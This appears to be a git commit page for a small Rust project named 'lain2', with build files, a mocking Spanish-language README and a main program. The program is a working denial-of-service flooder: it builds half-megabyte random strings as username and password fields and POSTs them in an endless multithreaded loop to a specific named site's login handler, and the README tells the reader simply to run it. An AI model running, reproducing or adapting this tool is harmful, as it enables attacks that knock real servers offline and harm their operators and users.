primer commit

y la ctm
This commit is contained in:
Lux Aliaga 2024-10-22 19:06:02 -03:00
commit c7c6b70f05
No known key found for this signature in database
GPG key ID: D6062F6E90133A56
6 changed files with 1561 additions and 0 deletions

1371
Cargo.lock generated Normal file

File diff suppressed because it is too large Load diff

12
Cargo.toml Normal file
View file

@ -0,0 +1,12 @@
[package]
name = "lain2"
version = "0.1.0"
edition = "2021"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
rand = "0.8.4"
num_cpus = "1.16"
reqwest = "0.12.8"
tokio = { version = "1", features = ["full"] }

8
README.md Normal file
View file

@ -0,0 +1,8 @@
# lain2
te meo longi ctm deja de wear con tu kga de PHP página qlia kmo las
weas te meo te meoooooo chúpame el picooo!!!!!!!!!!!!!!!!!!!!!!!!!!
## y que wea hago con esto?
`cargo run --release` y ya está, pitéate al qliao

92
flake.lock Normal file
View file

@ -0,0 +1,92 @@
{
"nodes": {
"flake-utils": {
"inputs": {
"systems": "systems"
},
"locked": {
"lastModified": 1726560853,
"narHash": "sha256-X6rJYSESBVr3hBoH0WbKE5KvhPU5bloyZ2L4K60/fPQ=",
"owner": "numtide",
"repo": "flake-utils",
"rev": "c1dfcf08411b08f6b8615f7d8971a2bfa81d5e8a",
"type": "github"
},
"original": {
"owner": "numtide",
"repo": "flake-utils",
"type": "github"
}
},
"naersk": {
"inputs": {
"nixpkgs": "nixpkgs"
},
"locked": {
"lastModified": 1721727458,
"narHash": "sha256-r/xppY958gmZ4oTfLiHN0ZGuQ+RSTijDblVgVLFi1mw=",
"owner": "nix-community",
"repo": "naersk",
"rev": "3fb418eaf352498f6b6c30592e3beb63df42ef11",
"type": "github"
},
"original": {
"owner": "nix-community",
"repo": "naersk",
"type": "github"
}
},
"nixpkgs": {
"locked": {
"lastModified": 0,
"narHash": "sha256-QUvb6epgKi9pCu9CttRQW4y5NqJ+snKr1FZpG/x3Wtc=",
"path": "/nix/store/lbqj1cndic4121whnx8xm0jgb1c8x4xx-source",
"type": "path"
},
"original": {
"id": "nixpkgs",
"type": "indirect"
}
},
"nixpkgs_2": {
"locked": {
"lastModified": 1729428082,
"narHash": "sha256-xb4/Y+Y7ZlkQaA5rXnrXplDzdt2Jfgdmar3+qkb56UA=",
"owner": "NixOS",
"repo": "nixpkgs",
"rev": "ca30f584e18024baf39c395001262ed936f27ebd",
"type": "github"
},
"original": {
"owner": "NixOS",
"ref": "nixpkgs-unstable",
"repo": "nixpkgs",
"type": "github"
}
},
"root": {
"inputs": {
"flake-utils": "flake-utils",
"naersk": "naersk",
"nixpkgs": "nixpkgs_2"
}
},
"systems": {
"locked": {
"lastModified": 1681028828,
"narHash": "sha256-Vy1rq5AaRuLzOxct8nz4T6wlgyUR7zLU309k9mBC768=",
"owner": "nix-systems",
"repo": "default",
"rev": "da67096a3b9bf56a91d16901293e51ba5b49a27e",
"type": "github"
},
"original": {
"owner": "nix-systems",
"repo": "default",
"type": "github"
}
}
},
"root": "root",
"version": 7
}

37
flake.nix Normal file
View file

@ -0,0 +1,37 @@
{
inputs = {
flake-utils.url = "github:numtide/flake-utils";
naersk.url = "github:nix-community/naersk";
nixpkgs.url = "github:NixOS/nixpkgs/nixpkgs-unstable";
};
outputs = { self, flake-utils, naersk, nixpkgs }:
flake-utils.lib.eachDefaultSystem (system:
let
pkgs = (import nixpkgs) {
inherit system;
};
naersk' = pkgs.callPackage naersk {};
in {
# For `nix build` & `nix run`:
defaultPackage = naersk'.buildPackage {
src = ./.;
};
# For `nix develop` (optional, can be skipped):
devShell = pkgs.mkShell {
nativeBuildInputs = with pkgs; [
rustc
cargo
clippy
openssl.dev
pkg-config
rust-analyzer
rustfmt
];
};
}
);
}

41
src/main.rs Normal file
View file

@ -0,0 +1,41 @@
use std::collections::HashMap;
use rand::{distributions::Alphanumeric, Rng};
use reqwest::Client;
use tokio::runtime;
#[tokio::main]
async fn main() {
let garbage: String = rand::thread_rng()
.sample_iter(&Alphanumeric)
.take(512000)
.map(char::from)
.collect();
println!("{} bytes pal qliao, a prepararse :3", garbage.len());
let mut params = HashMap::new();
params.insert("username", garbage.clone());
params.insert("password", garbage.clone());
let request = Client::new()
.post("https://usach.lat/procesar.php")
.form(&params);
let threads = num_cpus::get();
let rt = runtime::Builder::new_multi_thread()
.enable_io()
.enable_time()
.worker_threads(threads)
.build()
.expect("FUCK!!!!");
println!("pasa la raja usachin 😈");
loop {
let inner = request.try_clone().unwrap();
rt.spawn(async move {
let response = inner.send().await.unwrap();
println!("plap! {}", response.status());
})
.await
.unwrap();
}
}